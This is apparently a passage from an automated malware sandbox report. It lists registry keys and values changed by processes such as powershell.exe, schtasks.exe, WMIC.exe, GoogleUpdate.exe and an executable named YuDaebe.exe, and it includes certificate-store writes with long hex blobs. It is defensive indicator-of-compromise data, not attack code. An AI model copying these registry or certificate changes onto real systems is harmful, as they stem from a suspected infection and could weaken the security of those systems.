Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" YuDaebe.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
backgroundTaskHost.exeschtasks.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exeWMIC.exepowershell.exesvchost.exepowershell.exepowershell.exeGoogleUpdate.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs backgroundTaskHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" backgroundTaskHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs backgroundTaskHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust backgroundTaskHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WMIC.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" WMIC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs backgroundTaskHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WMIC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs backgroundTaskHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache GoogleUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WMIC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot backgroundTaskHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates backgroundTaskHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WMIC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5ad12640-0000-0000-0000-500600000000} svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA backgroundTaskHost.exe -
Modifies registry class 64 IoCs
Processes:
GoogleUpdate.exeGoogleUpdate.exeMicrosoftEdge.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeMicrosoftEdgeCP.exeGoogleUpdateComRegisterShell64.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeGoogleUpdateComRegisterShell64.exeMicrosoftEdgeCP.exeGoogleUpdateComRegisterShell64.exeMicrosoftEdge.exeMicrosoftEdge.exeGoogleUpdate.exeMicrosoftEdgeCP.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreMachineClass\ = "Google Update Core Class" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA}\ProxyStubClsid32 GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\NumMethods GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\ProxyStubClsid32\ = "{A3ADC43E-56D9-4EC1-ADDA-49C5B9069B07}" GoogleUpdate.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\NumMethods\ = "4" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\NumMethods GoogleUpdateComRegisterShell64.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42}\Elevation\Enabled = "1" GoogleUpdate.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "9" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a9472ac7d3b6d701 MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\ = "IApp2" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CredentialDialogMachine\CurVer\ = "GoogleUpdate.CredentialDialogMachine.1.0" GoogleUpdate.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\yourhotfeed.com\Total = "158" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964} GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\Elevation\IconReference = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.111\\goopdate.dll,-1004" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF} GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\Elevation GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\NumMethods GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachineFallback.1.0\ = "Google Update Legacy On Demand" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\ProxyStubClsid32\ = "{A3ADC43E-56D9-4EC1-ADDA-49C5B9069B07}" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\ = "IAppWeb" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\NumMethods\ = "17" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}\ = "IGoogleUpdate" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28} GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 400d338a05b7d701 MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\ProxyStubClsid32\ = "{A3ADC43E-56D9-4EC1-ADDA-49C5B9069B07}" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachine.1.0\ = "Google Update Broker Class Factory" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\NumMethods GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B} GoogleUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{6F8BD55B-E83D-4A47-85BE-81FFA8057A69}\ELEVATION GoogleUpdate.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\NumMethods GoogleUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\VERSIONINDEPENDENTPROGID GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42}\Elevation GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3WebMachine\ = "Google Update Broker Class Factory" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\LocalServer32 GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8324F243-250C-4E97-915C-8220BAE15E18}\InprocHandler32 GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57} GoogleUpdateComRegisterShell64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3COMClassService.1.0\CLSID\ = "{4EB61BAC-A3B6-4760-9581-655041EF4D69}" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{9465B4B4-5216-4042-9A2C-754D3BCDC410}\LocalService = "gupdatem" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\NumMethods\ = "24" GoogleUpdateComRegisterShell64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9B2340A0-4068-43D6-B404-32E27217859D}\Elevation GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9B2340A0-4068-43D6-B404-32E27217859D}\LocalServer32 GoogleUpdate.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{534F5323-3569-4F42-919D-1E1CF93E5BF6} GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\NumMethods GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\NumMethods GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdge.exe -
Processes:
installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7